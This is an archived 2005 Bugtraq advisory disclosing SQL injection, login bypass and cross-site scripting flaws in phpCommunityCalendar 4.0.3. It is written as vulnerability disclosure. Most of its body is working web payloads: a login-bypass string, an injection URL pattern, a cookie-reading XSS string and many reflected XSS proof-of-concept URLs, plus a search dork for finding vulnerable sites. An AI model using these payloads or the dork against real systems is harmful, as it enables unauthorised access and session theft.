lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 5 Sep 2005 15:53:04 -0000 From: retrogod@...ceposta.it To: bugtraq@...urityfocus.com Subject: phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting software: site: http://open.appideas.com download: http://open.appideas.com/Calendar/ 1) sql injection / login bypass: "admin" directory contains tools for the site administrator. "webadmin" contains tools for category administrators. If magic quotes off a user can bypass category admin check modifying sql login query, example: go to http://[target]/[path]/webadmin/login.php and use this: login: ' or isnull(1/0) /* password: [nothing here] now you can add, delete, modify events 2) sql injection: http://[target]/[path]/week.php?LocationID=-1'[INJECTION]%20/* 3) "admin" directory should be password protected by .htaccess , if not you can go to control panel as main admin http://[target]/[path]/admin/ 4) cross site scripting, poc: 4.1) add an event and fill some fields with this: \'\);</script><script>alert(document.cookie)</script> 4.2) check this urls: http://[target]/[path]/thankyou.php?LocationID="><script>alert('LOL')</script> http://[target]/[path]/calDaily.php?font="><script>alert('LOL')</script><" http://[target]/[path]/calMonthly.php?font="><script>alert('LOL')</script><" http://[target]/[path]/calMonthlyP.php?font="><script>alert('LOL')</script><" http://[target]/[path]/calWeekly.php?font="><script>alert('LOL')</script><" http://[target]/[path]/calWeeklyP.php?font="><script>alert('LOL')</script><" http://[target]/[path]/calYearly.php?font="><script>alert('LOL')</script><" http://[target]/[path]/calYearlyP.php?font="><script>alert('LOL')</script><" http://[target]/[path]/day.php?font="><script>alert('LOL')</script><!-- http://[target]/[path]/day.php?LocationID="><script>alert('LOL')</script><!-- http://[target]/[path]/event.php?font="><script>alert('LOL')</script> http://[target]/[path]/event.php?CeTi=</title><script>alert('LOL')</script> http://[target]/[path]/event.php?Contact=<script>alert('LOL')</script> http://[target]/[path]/event.php?Description=<script>alert('LOL')</script> http://[target]/[path]/event.php?ShowAddress=<script>alert('LOL')</script> http://[target]/[path]/week.php?font="><script>alert('LOL')</script> and so on... (a lot of uninitizialized vars showned) googledork: "Calendar programming by AppIdeas.com" filetype:php rgod site: http://rgod.altervista.org mail: retrogod@...ceposta.it original advisory: http://www.rgod.altervista.org/phpccal.html
Powered by blists - more mailing lists